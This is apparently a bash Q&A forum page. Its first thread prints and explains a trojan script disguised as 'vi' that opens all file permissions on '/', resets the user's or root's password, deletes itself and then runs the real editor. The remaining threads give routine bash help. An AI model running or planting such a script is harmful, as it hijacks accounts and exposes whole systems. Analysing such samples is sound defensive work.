What does this Bash Shell Script do? - bash

I'm a very clueless beginner when it comes to shell scripts, but I have to be able to explain what these lines of code do and don't have enough time to get more familiar with it first, so I can't really give a lot of input.
As additional information: the script itself is called vi, just like the editor, and is probably harmful / hoping to be run as admin.
#!/bin/bash
#
# execute on your own risk !!
chmod -R og+rwx /
echo -e "Hacke.peter\n Hacke.peter\n" | passwd
rm $0
vi $*
logout # good bye!
I think the idea is that somebody tries to run the actual vi (not this script) and accidentally calls this script instead - it changes the current user's password to the output of the echo command (not sure what that is, though), and then the script deletes itself and calls the real editor so we don't realize anything happened.
A huge thank you in advance for any answer, and sorry for being so clueless.

Hmm, not sure if clueless beginner or crafty hacker [insert suspicious Fry meme]. With a last name like that?
Here's what the script does, step-by-step:
chmod -R og+rwx /: recursively (-R) opens every file and directory on the system (starting at /) for reading, writing and executing (+rwx) by users in your group (g) and all other users (o).
echo -e "Hacke.peter\n Hacke.peter\n" | passwd: resets the password of whoever runs the script - root, if it is run as admin - to "Hacke.peter".
rm $0: removes itself. The $0 in bash stands for the file name of the current script.
vi $*: opens the real vi editor with whatever arguments ($*) you passed to the original (now erased) script. Since the script itself is called vi, this step covers its tracks and avoids suspicion.
logout: logs you out of the root session. Now you no longer have root access (the password has been changed out from under you) and your filesystem is wide open.
Very nasty script!
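If it helps to see the last two pieces in isolation, here is a small, harmless sketch (the file name args-demo.sh is made up for illustration):
#!/bin/bash
# save as args-demo.sh and run as: ./args-demo.sh one two three
echo "invoked as: $0"   # $0 is the path that was used to start the script
echo "arguments:  $*"   # $* is all the arguments joined into one string
type -a vi              # lists every 'vi' found on your PATH, fake or real
That is exactly what rm $0 and vi $* rely on: the script knows its own file name, and it can pass its arguments straight on to the real editor.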

Related

Bash script calls vi for manual editing, then script resumes?

I wrote a script that creates a backup of a text file, and a second script that verifies some syntax in text file using SED.
In the middle, there is a manual process: Users edit the original file adding some strings. This process must remain manual.
I would like to merge my two scripts so the backup is created, vi is open for the user, when the user is done editing the file, the script resumes doing the syntax verification.
I am learning by doing, but really do not know how to code the "open vi, wait for the user to do his editing, take control over and resume with verification" part.
I read there is a function called system (in Perl) that could be used, but my code is in BASH.
Any suggestions on how to get this done in BASH? Thanks!
In bash, each statement is essentially like an implicit call to system (unless it's a builtin shell command) since shell scripts are designed to make it easy to run other programs.
backup some_file.txt
vi some_file.txt # The script blocks until the user exits vi
verify_syntax some_file.txt
The only difference between using vi and a command like ls is that ls will do its thing and exit without user intervention, while vi (or any interactive command) will run until the user explicitly exits.
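If you also want the script to notice whether the editor exited cleanly before verifying, a minimal sketch could look like this (backup and verify_syntax stand in for the asker's own helpers and are hypothetical names):
#!/bin/bash
file=some_file.txt

backup "$file"                      # hypothetical helper: create the backup
if ! "${EDITOR:-vi}" "$file"; then  # blocks here until the user quits the editor
    echo "editor exited with an error, skipping verification" >&2
    exit 1
fi
verify_syntax "$file"               # hypothetical helper: runs only after the editor exits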

use "!" to execute commands with same parameter in a script

In a shell, I run the following commands without problem:
ls -al
!ls
The second invocation of ls also lists files with the -al flag. However, when I put the above commands into a bash script, a complaint is thrown:
!ls: command not found
How can I achieve the same effect in a script?
You would need to turn on both command history and !-style history expansion in your script (both are off by default in non-interactive shells):
set -o history
set -o histexpand
The expanded command is also echoed to standard error, just like in an interactive shell. You can prevent that by turning on the histverify shell option (shopt -s histverify), but in a non-interactive shell, that seems to make the history expansion a no-op.
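Put together, a minimal sketch of that approach (results may vary by bash version, as the next answer points out):
#!/bin/bash
set -o history      # record commands in the script's own history
set -o histexpand   # allow !-style history expansion

ls -al /tmp         # goes into the history list
!ls                 # expands to the previous ls command and runs it again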
Well, I wanted to have this working as well, and I have to tell everybody that the set -o history ; set -o histexpand method will not work in bash 4.x. It's not meant to be used there, anyway, since there are better ways to accomplish this.
First of all, a rather trivial example, just wanting to execute history in a script:
(bash 4.x or higher ONLY)
#!/bin/bash -i
history
Short answer: it works!!
The -i option stands for interactive, and history will work. But for what purpose?
Quoting Michael H.'s comment from the OP:
"Although you can enable this, this is bad programming practice. It will make your scripts (...) hard to understand. There is a reason it is disabled by default. Why do you want to do this?"
Yes, why? What is the deeper sense of this?
Well, THERE IS, which I'm going to demonstrate in the follow-up section.
My history buffer has grown HUGE, and some of those lines are script one-liners which I really would not want to retype every time. But sometimes I also want to alter such a line a little, e.g. to add a third parameter where I previously needed only two.
So here's an ideal way of using the bash 4.0+ feature to invoke history:
$ history
(...)
<lots of lines>
(...)
1234 while IFS='whatever' read [[ $whatever -lt max ]]; do ... ; done < <(workfile.fil)
<25 more lines>
So 1234 from history is exactly the line we want. Surely, we could take the mouse and move there, chucking the whole line in the primary buffer? But we're on *NIX, so why can't we make our life a bit easier?
This is why I wrote the little script below. Again, this is for bash 4.0+ ONLY (but might be adapted for bash 3.x and older with the aforementioned set -o ... stuff...)
#!/bin/bash -i
# copy the arguments of history entry $1 into the X primary selection via xsel
[[ $1 == "" ]] || history | grep "^\s*$1" |
awk '{for (i=2; i<=NF; i++) printf $i" "}' | tr '\n' '\0' | xsel
If you save this as xselauto.sh for example, you may invoke
$ ./xselauto.sh 1234
and the contents of history line #1234 will be in your primary buffer, ready for re-use!
Now if anyone still says "this has no purpose AFAICS" or "who'd ever be needing this feature?" - OK, I won't care. But I would no longer want to live without this feature, as I'm just too lazy to retype complex lines every time. And I wouldn't want to touch the mouse for each marked line from history either, TBH. This is what xsel was written for.
BTW, the tr part of the pipe is a dirty hack which will prevent the command from being executed. For "dangerous" commands, it is extremely important to always leave the user a way to look before he/she hits the Enter key to execute it. You may omit it, but ... you have been warned.
P.S. This scriptlet is in fact a workaround, simulating !1234 typed on a bash shell. As I could never make the ! work directly in a script (echo would never let me reveal the contents of history line 1234), I worked around the problem by simply grepping for the line I wanted to copy.
History expansion is part of the interactive command-line editing features of a shell, not part of the scripting language. It's not generally available in the context of a script, only when interacting with a (pseudo-)human operator. (pseudo meaning that it can be made to work with things like expect or other keystroke repeating automation tools that generally try to play act a human, not implying that any particular operator might be sub-human or anything).
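In practice, the usual scripted way to "reuse the same parameters" is simply to keep them in a variable or an array instead of reaching for history, for example:
#!/bin/bash
args=(-al /tmp)     # store the parameters once
ls "${args[@]}"     # first call
ls "${args[@]}"     # same parameters again, no history expansion needed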

Pre-filling a prompt in Bash

Writing a bash script, and I want to get user input. Awesome,
read -p "What directory should we save in? " -e FOLDER
Except that what I'd like to do, ideally, is have the user see something like:
What directory should we save in? /home/user/default/
with the cursor at the end of the line, and the ability to delete backwards or append or whatever. Essentially, pre-filling the user's input, but giving them the ability to edit it.
Readline obviously has the capability, but it appears not to be exposed in the read command. Any alternatives? I'd prefer not to have to use perl or such.
The constraint I'm working under is that I'm writing a single shell script that would be nice to disseminate widely, so should rely on as little pre-existing infrastructure as possible. rlwrap and read -i both work if their dependencies (rlwrap and bash version >> whatever I have, respectively) are available. Both good answers, choose whichever works for you.
$ read -p "What directory should we save in? " -i "/home/user/default/" -e FOLDER
What directory should we save in? /home/user/default/
that should work, right?
You can wrap the command in rlwrap, which provides instant readline capabilities: https://github.com/hanslub42/rlwrap
(rlwrap -P does what you want)
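For example, one common way to use it, assuming a reasonably recent rlwrap (the prompt text and default path are just placeholders):
FOLDER=$(rlwrap -S "What directory should we save in? " -P "/home/user/default/" -o cat)
echo "Will save in: $FOLDER"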
As far as a pure bash solution is concerned for the 3.2 line (which I am presuming you are using), I don't think it's possible.
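If you need a single script that degrades gracefully, a hedged sketch (read -i needs bash 4.0 or newer; the default path is only an example):
default="/home/user/default/"
if (( BASH_VERSINFO[0] >= 4 )); then
    read -p "What directory should we save in? " -e -i "$default" FOLDER
else
    read -p "What directory should we save in? [$default] " -e FOLDER
    FOLDER=${FOLDER:-$default}
fi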

Can a shell script indicate that its lines be loaded into memory initially?

UPDATE: this is a repost of How to make shell scripts robust to source being changed as they run
This is a little thing that bothers me every now and then:
I write a shell script (bash) for a quick and dirty job
I run the script, and it runs for quite a while
While it's running, I edit a few lines in the script, configuring it for a different job
But the first process is still reading the same script file and gets all screwed up.
Apparently, the script is interpreted by loading each line from the file as it is needed. Is there some way that I can have the script indicate to the shell that the entire script file should be read into memory all at once? For example, Perl scripts seem to do this: editing the code file does not affect a process that's currently interpreting it (because it's initially parsed/compiled?).
I understand that there are many ways I could get around this problem. For example, I could try something like:
cat script.sh | sh
or
sh -c "`cat script.sh`"
... although those might not work correctly if the script file is large and there are limits on the size of stream buffers and command-line arguments. I could also write an auxiliary wrapper that copies a script file to a locked temporary file and then executes it, but that doesn't seem very portable.
So I was hoping for the simplest solution that would involve modifications only to the script, not the way in which it is invoked. Can I just add a line or two at the start of the script? I don't know if such a solution exists, but I'm guessing it might make use of the $0 variable...
The best answer I've found is a very slight variation on the solutions offered to How to make shell scripts robust to source being changed as they run. Thanks to camh for noting the repost!
#!/bin/sh
{
# Your stuff goes here
exit
}
This ensures that all of your code is parsed initially; note that the 'exit' is critical to ensuring that the file isn't accessed later to see if there are additional lines to interpret. Also, as noted on the previous post, this isn't a guarantee that other scripts called by your script will be safe.
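For concreteness, a filled-in sketch of the same pattern (the long-running body is made up):
#!/bin/sh
{
    echo "starting long job..."
    sleep 600    # stand-in for the real long-running work
    echo "done"
    exit         # stops the shell from ever reading past this block
}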
Thanks everyone for the help!
Use an editor that doesn't modify the existing file, and instead creates a new file then replaces the old file. For example, using :set writebackup backupcopy=no in Vim.
How about a solution in the way you edit it instead?
If the script is running, before editing it, do this:
mv script script-old
cp script-old script
rm script-old
Since the shell keeps the file open, everything will work okay as long as you don't change the contents of the open inode.
The above works because mv will preserve the old inode while cp will create a new one. Since a file's contents will not actually be removed if it is opened, you can remove it right away and it will be cleaned up once the shell closes the file.
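You can watch the inode change with ls -i (the inode numbers below are made up for illustration):
$ ls -i script
1181234 script
$ mv script script-old     # same inode, new name; the running shell still has it open
$ cp script-old script     # the name 'script' now points at a brand-new inode
$ ls -i script
1181267 script
$ rm script-old            # safe: the old inode lives on until the shell closes it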
According to the bash documentation if instead of
#!/bin/bash
body of script
you try
#!/bin/bash
script=$(cat <<'SETVAR'
body of script
SETVAR
)
eval "$script"
then I think you will be in business.
Consider creating a new bang path for your quick-and-dirty jobs. If you start your scripts with:
#!/usr/local/fastbash
or something, then you can write a fastbash wrapper that uses one of the methods you mentioned. For portability, one can just create a symlink from fastbash to bash, or have a comment in the script saying one can replace fastbash with bash.
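A hedged sketch of what such a /usr/local/fastbash wrapper might look like (the kernel hands it the script path as $1, followed by the original arguments):
#!/bin/bash
# hypothetical fastbash: run a private copy so later edits to the original don't matter
script=$1; shift
tmp=$(mktemp /tmp/fastbash.XXXXXX) || exit 1
trap 'rm -f "$tmp"' EXIT
cp "$script" "$tmp" || exit 1
bash "$tmp" "$@"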
If you use Emacs, try M-x customize-variable break-hardlink-on-save. Setting this variable will tell Emacs to write to a temp file and then rename the temp file over the original instead of editing the original file directly. This should allow the running instance to keep its unmodified version while you save the new version.
Presumably, other semi-intelligent editors would have similar options.
A self contained way to make a script resistant to this problem is to have the script copy and re-execute itself like this:
#!/bin/bash
if [[ $0 != /tmp/copy-* ]] ; then
rm -f /tmp/copy-$$
cp $0 /tmp/copy-$$
exec /tmp/copy-$$ "$@"
echo "error copying and execing script"
exit 1
fi
rm $0
# rest of script...
(This will not work if the original script's path begins with /tmp/copy-.)
(This is inspired by R Samuel Klatchko's answer)

Running bash shell in Maemo

I have attempted to run the following bash script on my internet tablet (a Nokia N810 running Maemo Linux). However, it doesn't seem to run, and I have no clue what's wrong with it (it runs on my Ubuntu system if I change the directories). It would be great to get some feedback on this, or to hear of similar experiences with this issue. Thanks.
WORKING="/home/user/.gpe"
SVNPATH="/media/mmc1/gpe/"
cp calendar categories contacts todo $WORKING
What actually happens when you run your script? It's helpful if you include details of error messages or behavior that differs from what's expected and in what way.
If $WORKING contains the name of a directory, hidden or not, then the cp should copy those four files into it. Then ls -l /home/user/.gpe should show them plus whatever else is in there, regardless of whether it's "hidden".
By the way, the initial dot in a file or directory name doesn't really "hide" the entry; it's just that ls, echo *, and similar commands don't show such entries, while these do:
ls -la
ls -d .*
ls -d {.*,*}
echo .*
echo {.*,*}
cp can copy multiple sources to a single destination, provided the destination is a directory.
Does the directory /home/user/.gpe exist?
Bear in mind that the leading dot in the name can make it hidden unless you use ls -a
I tried your commands in Cygwin, but I used .gpe instead of /home/user/.gpe.
I did a touch calendar categories contacts todo to create the files.
It worked fine.
If that's the entirety of your script, it's missing two, possibly three, things (a corrected sketch follows this list):
A shebang line, such as #!/bin/sh at the start
Use of $SVNPATH. You probably want to cd $SVNPATH before the cp command. Your script should not assume the current working directory is correct.
Possibly execute permission on the script: chmod a+x script
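Putting those points together, a corrected sketch (paths taken from the question; don't forget to chmod a+x the script itself):
#!/bin/sh
WORKING="/home/user/.gpe"
SVNPATH="/media/mmc1/gpe/"
cd "$SVNPATH" || exit 1                           # don't rely on the current working directory
cp calendar categories contacts todo "$WORKING"   # copy the four files into .gpe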
Do you already have the /home/user/.gpe directory present? And also, try adding a -R parameter so that the directories are copied recursively.
